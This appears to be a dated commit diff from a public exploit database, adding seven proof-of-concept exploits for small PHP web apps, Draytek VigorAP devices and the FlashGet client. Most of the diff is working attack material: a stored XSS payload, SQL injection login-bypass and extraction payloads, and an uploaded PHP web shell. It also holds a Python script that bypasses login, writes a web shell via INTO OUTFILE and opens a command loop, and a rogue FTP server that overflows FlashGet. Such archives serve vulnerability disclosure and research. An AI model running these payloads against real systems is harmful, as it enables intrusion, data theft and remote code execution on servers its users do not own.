DB: 2020-05-08

7 changes to exploits/shellcodes

FlashGet 1.9.6 - Denial of Service (PoC)
Car Park Management System 1.0 - Authentication Bypass
Draytek VigorAP 1000C - Persistent Cross-Site Scripting
School File Management System 1.0  - 'username' SQL Injection
Online Clothing Store 1.0 - Arbitrary File Upload
Pisay Online E-Learning System 1.0 - Remote Code Execution
Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection

exploits/hardware/webapps/48436.txt

@@ -0,0 +1,147 @@
+# Title: Draytek VigorAP 1000C - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-05-07
+# Vendor: https://www.draytek.com/
+# Software: https://www.draytek.com/products/vigorap-903/
+# CVE: N/A
+
+Document Title:
+===============
+Draytek VigorAP - (RADIUS) Persistent XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2244
+
+
+Common Vulnerability Scoring System:
+====================================
+4
+
+
+Product & Service Introduction:
+===============================
+https://www.draytek.com/
+https://www.draytek.com/products/vigorap-903/
+
+
+
+Affected Product(s):
+====================
+Draytek
+[+] VigorAP 1000C | 1.3.2
+[+] VigorAP 700 | 1.11
+[+] VigorAP 710 | 1.2.5
+[+] VigorAP 800 | 1.1.4
+[+] VigorAP 802 | 1.3.2
+[+] VigorAP 810 | 1.2.5
+[+] VigorAP 900 | 1.2.0
+[+] VigorAP 902 | 1.2.5
+[+] VigorAP 903 | 1.3.1
+[+] VigorAP 910C | 1.2.5
+[+] VigorAP 912C | 1.3.2
+[+] VigorAP 918R Series | 1.3.2
+[+] VigorAP 920R Series | 1.3.0
+[+] All other VigorAP Series with Radius Module
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-07: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent input validation vulnerability has been discovered in the
+official Draytek VigorAP product series application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent input validation web vulnerability is located in the
+username input field of the RADIUS Setting - RADIUS Server
+Configuration module. Remote attackers with limited access are able to
+inject own malicious persistent script codes as username.
+Other privileged user accounts execute on preview of the modules
+context. The request method to inject is POST and the attack
+vector is located on the application-side.
+
+Successful exploitation of the vulnerability results in session
+hijacking, persistent phishing attacks, persistent external
+redirects to malicious source and persistent manipulation of affected
+application modules.
+
+Vulnerable Module(s):
+[+] RADIUS Setting - RADIUS Server Configuration - Users Profile
+
+Vulnerable Input(s):
+[+] Username
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by
+remote attackers with low privileged user account and low user interaction.
+For security demonstration or to reproduce the security vulnerability
+follow the provided information an steüs below to continue.
+
+
+PoC: Payload
+<iframe src=evil.source onload=alert(document.domain)></iframe>
+
+
+PoC: Vulnerable Source (http:/vigorAP.localhost:50902/home.asp)
+<div class="box">
+<table width="652" cellspacing="1" cellpadding="2">
+<tbody><tr>
+<th id="userName">Username</th>
+<th id="passwd">Password</th>
+<th id="confirmPasswd">Confirm Password</th>
+<th id="configure">Configure</th>
+</tr>
+<tr>
+<td><input maxlength="24" type="text" id="addusr"></td>
+<td><input maxlength="24" type="password" id="addpwd"></td>
+<td><input maxlength="24" type="password" id="addpwdcfm"></td>
+<td><input type="button" id="btnAddUser" value="Add" class="add"
+onclick="addUser()">
+<input type="button" id="btnCancelUser" value="Cancel" class="add"
+onclick="cancelUser()"></td>
+</tr>
+</tbody></table>
+<table class="content" width="652" cellspacing="1" cellpadding="2">
+<tbody id="usersTb">
+<tr>
+<th id="userNo">NO.</th>
+<th id="userNames">Username</th>
+<th id="userSelect">Select</th>
+</tr>
+<tr><td>1</td><td>test</td><td><input type="checkbox"><input
+type="hidden" value="test"></td></tr>
+tr><td>2</td><td><iframe src=evil.source
+onload=alert(document.domain)></iframe></td><td><input type="checkbox">
+<input type="hidden" value="asd"></td></tr></tbody>
+</table>
+<p><input type="button" id="btnDelSelUser" value="Delete Selected"
+class="del" onclick="delSelUser()">
+<input type="button" id="btnDelAllUser" value="Delete All" class="del"
+onclick="delAllUser()">
+</p></div>
+
+
+Reference(s):
+http:/vigorAP.localhost:50902/
+http:/vigorAP.localhost:50902/home.asp
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM

exploits/php/webapps/48435.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Car Park Management System 1.0 - Authentication Bypass
+# Date: 2020-05-07
+# Exploit Author: Tarun Sehgal
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/car-park-management-system.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: phone and password
+#Injected Request
+#Below request will allow authentication bypass
+
+POST /Car%20Park%20Management%20System/proc/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 52
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/Car%20Park%20Management%20System/
+Cookie: PHPSESSID=d84agc0pp6qihtm7u775ftvukd
+Upgrade-Insecure-Requests: 1
+
+phone=' or '1'='1&password=' or '1'='1&Submit=Log+In

exploits/php/webapps/48437.txt

@@ -0,0 +1,32 @@
+# Exploit Title: School File Management System 1.0  - 'username' SQL Injection
+# Date: 2020-05-04
+# Exploit Author: Tarun Sehgal
+# Vendor Homepage: https://www.sourcecodester.com/php/14155/school-file-management-system.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/school-file-management-system.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: username
+# Injected Request
+POST /sfms/admin/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 173
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/sfms/admin/index.php
+Cookie: PHPSESSID=084gi60nhgqp5lpba3q6qngk9g
+Upgrade-Insecure-Requests: 1
+
+username=admin' OR 1 GROUP BY CONCAT(database(),(SELECT (CASE WHEN (7665=7665) THEN 1 ELSE 0 END)),0x3a,0x3a,version(),FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=admin&login=
+
+
+
+//Comment
+Above request will print database name and MariaDB version.

exploits/php/webapps/48438.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Online Clothing Store 1.0 - Arbitrary File Upload
+# Date: 2020-05-05
+# Exploit Author: Sushant Kamble and Saurav Shukla
+# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: Products.php
+
+#Exploit
+	Open Products.php and select any product
+	Fill details
+	Create php shell code with below script
+		<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
+	Click on upload Image
+	Select php file
+	Click Submet
+	Access below URL:
+		http://localhost/online%20Clothing%20Store/Products/shell.php?e=dir
+	add system commands after e to execute it.

exploits/php/webapps/48439.txt

@@ -0,0 +1,74 @@
+# Exploit Title: Pisay Online E-Learning System 1.0 - Remote Code Execution
+# Exploit Author: Bobby Cooke
+# Date: 2020-05-05
+# Vendor Homepage: https://www.sourcecodester.com/php/14192/pisay-online-e-learning-system-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/e-learningsystem_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+# Description: Pisay Online E-Learning System v1.0 - SQLi Auth Bypass + Remote Code Execution (RCE)
+
+# Vulnerable Source Code:
+# /e-learningsystem/admin/login.php
+#  121   $email = trim($_POST['user_email']);
+#  122   $upass  = trim($_POST['user_pass']);
+#  123   $h_upass = sha1($upass);
+#  132     $user = new User();
+#  134     $res = $user::userAuthentication($email, $h_upass);
+# /e-learningsystem/include/accounts.php
+#    3 class User {
+#   23     static function userAuthentication($email,$h_pass){
+#   25         $mydb->setQuery("SELECT * FROM `tblusers` WHERE `UEMAIL` = '". $email ."' and `PASS` = '". $h_pass ."'");
+# /e-learningsystem/admin/modules/lesson/edit.php
+#    6   @$id = $_GET['id'];
+#    7     if($id==''){
+#   10   $lesson = New Lesson();
+#   11   $res = $lesson->single_lesson($id);
+# /e-learningsystem/include/lessons.php
+#    4  class Lesson {
+#    5     protected static  $tblname = "tbllesson";
+#   35     function single_lesson($id=0){
+#   37-38          $mydb->setQuery("SELECT * FROM ".self::$tblname." Where LessonID= '{$id}' LIMIT 1");
+
+import requests, sys, re
+
+requests.packages.urllib3.\
+disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def webshell(SERVER_URL):
+    try:
+        while True:
+            cmd = raw_input('C:\\ ')
+            command = {'cmd': cmd}
+            r2 = s.get(SERVER_URL+'../../../../webshell.php', params=command, verify=False)
+            response = r2.text
+            cleanResponse = response.replace('AAAAAAAAAAAAAAA', '')
+            cleanResponse = cleanResponse.replace('313371337', '')
+            print(cleanResponse)
+    except:
+        print("\r\nExiting.")
+        sys.exit(-1)
+
+if __name__ == "__main__":
+    if len(sys.argv) != 2:
+        print "(+) Usage:   %s <SERVER_URL>" % sys.argv[0]
+        print "(+) Example: %s 'https://10.0.0.3:443/e-learningsystem/'" % sys.argv[0]
+        sys.exit(-1)
+    SERVER_URL = sys.argv[1]
+    ADMIN_URL = SERVER_URL + 'admin/login.php'
+    LESSON_URL = SERVER_URL + 'admin/modules/lesson/index.php'
+    s = requests.Session()
+    s.get(SERVER_URL, verify=False)
+    payload1 = {'user_email': "boku' OR 1337=1337 LIMIT 1 -- PowerUp", 'user_pass': 'InstantTransmission', 'btnLogin': ''}
+    s.post(ADMIN_URL, data=payload1, verify=False)
+
+    payload2 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA",@@datadir,"AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" -- kamahamaha'}
+    r1 = s.get(LESSON_URL, params=payload2, verify=False)
+    dirtyPath = str(re.findall(r'"Title" type="text" value=".*>', r1.text))
+    dataPath=re.sub('^.*"Title" type="text" value="', '', dirtyPath)
+    dataPath=re.sub('">.*$', '', dataPath)
+    dataPath=dataPath.replace('\\\\', '/')
+    xamppPath=re.sub('xampp.*', 'xampp', dataPath)
+    payload3 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA","<?php echo shell_exec($_GET[\'cmd\']);?>","AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" into OUTFILE \''+xamppPath+'/htdocs/webshell.php\' -- kamahamaha'}
+    print(payload3)
+    s.get(LESSON_URL, params=payload3, verify=False)
+    webshell(SERVER_URL)

exploits/php/webapps/48440.txt

@@ -0,0 +1,51 @@
+# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection
+# Google Dork: N/A
+# Date: 2020-05-07
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-agroculture-farm-management-system-phpmysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14198&title=Online+AgroCulture+Farm+Management+System+in+PHP%2FMySQL
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Discription:
+The Online AgroCulture Farm Management System v1.0 application is vulnerable to
+SQL injection via the 'pid' parameter on the review.php page.
+# vulnerable file : review.php
+http://localhost/AgroCulture/review.php?pid=27
+
+Parameter: pid (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: pid=27' AND 5853=5853 AND 'EmvW'='EmvW
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: pid=27' AND (SELECT 9739 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(9739=9739,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tpnl'='tpnl
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: pid=27' AND (SELECT 7650 FROM (SELECT(SLEEP(5)))bwDl) AND 'IWff'='IWff
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 8 columns
+    Payload: pid=-6157' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL-- RXWN
+[INFO] the back-end DBMS is MySQL
+web application technology: PHP, Apache 2.4.39, PHP 7.2.18
+back-end DBMS: MySQL >= 5.0
+
+
+# Proof of Concept:
+http://localhost/vulnerability/ncn/AgroCulture/review.php?pid=sqli
+
+GET AgroCulture/review.php?pid=27 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie:PHPSESSID=gd27cb23t7m8o57giuvh0f8e7m
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+pid=-6157%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL--%20RXWN

exploits/windows/dos/48434.py

@@ -0,0 +1,54 @@
+# Exploit Title: FlashGet 1.9.6 - Denial of Service (PoC)
+# Date: 2020-05-02
+# Author: Milad Karimi
+# Testen on: Kali Linux
+# Software Link: http://www.flashget.com/en/download.htm?uid=undefined
+# Version: 1.9.6
+# CVE : N/A
+
+#!/usr/bin/python
+
+from time import sleep
+from socket import *
+
+res = [
+    '220 WELCOME!! :x\r\n',
+    '331 Password required for %s.\r\n',
+    '230 User %s logged in.\r\n',
+    '250 CWD command successful.\r\n',
+    '257 "%s/" is current directory.\r\n' # <-- %s B0f :x
+    ]
+
+buf = 'A' * 332
+
+s = socket(AF_INET, SOCK_STREAM)
+s.bind(('0.0.0.0', 21))
+s.listen(1)
+print '[+] listening on [FTP] 21 ...\n'
+c, addr = s.accept()
+c.send(res[0])
+
+user = ''
+
+for i in range(1, len(res)):
+    req = c.recv(1024)
+    print '[*][CLIENT] %s' % (req)
+    tmp = res[i]
+    if(req.find('USER') != -1):
+        req = req.replace('\r\n', '')
+        user = req.split('\x20', 1)[1]
+        tmp %= user
+    if(req.find('PASS') != -1):
+        tmp %= user
+    if(req.find('PWD') != -1):
+        tmp %= buf    
+    print '[*][SERVER] %s' % (tmp)    
+    c.send(tmp)
+
+sleep(5)
+c.close()
+s.close()
+
+print '[+] DONE'
+ 
+# Discovered By : Milad Karimi

files_exploits.csv

@@ -6730,6 +6730,7 @@ id,file,description,date,author,type,platform,port
 48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
 48342,exploits/hardware/dos/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",dos,hardware,
 48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows,
+48434,exploits/windows/dos/48434.py,"FlashGet 1.9.6 - Denial of Service (PoC)",2020-05-07,"Milad karimi",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42666,3 +42667,9 @@ id,file,description,date,author,type,platform,port
 48431,exploits/ruby/webapps/48431.txt,"GitLab 12.9.0 - Arbitrary File Read",2020-05-06,KouroshRZ,webapps,ruby,
 48432,exploits/php/webapps/48432.txt,"YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection",2020-05-06,coiffeur,webapps,php,
 48433,exploits/php/webapps/48433.txt,"MPC Sharj 3.11.1 - Arbitrary File Download",2020-05-06,SajjadBnd,webapps,php,
+48435,exploits/php/webapps/48435.txt,"Car Park Management System 1.0 - Authentication Bypass",2020-05-07,"Tarun Sehgal",webapps,php,
+48436,exploits/hardware/webapps/48436.txt,"Draytek VigorAP 1000C - Persistent Cross-Site Scripting",2020-05-07,Vulnerability-Lab,webapps,hardware,
+48437,exploits/php/webapps/48437.txt,"School File Management System 1.0  - 'username' SQL Injection",2020-05-07,"Tarun Sehgal",webapps,php,
+48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php,
+48439,exploits/php/webapps/48439.txt,"Pisay Online E-Learning System 1.0 - Remote Code Execution",2020-05-07,boku,webapps,php,
+48440,exploits/php/webapps/48440.txt,"Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection",2020-05-07,BKpatron,webapps,php,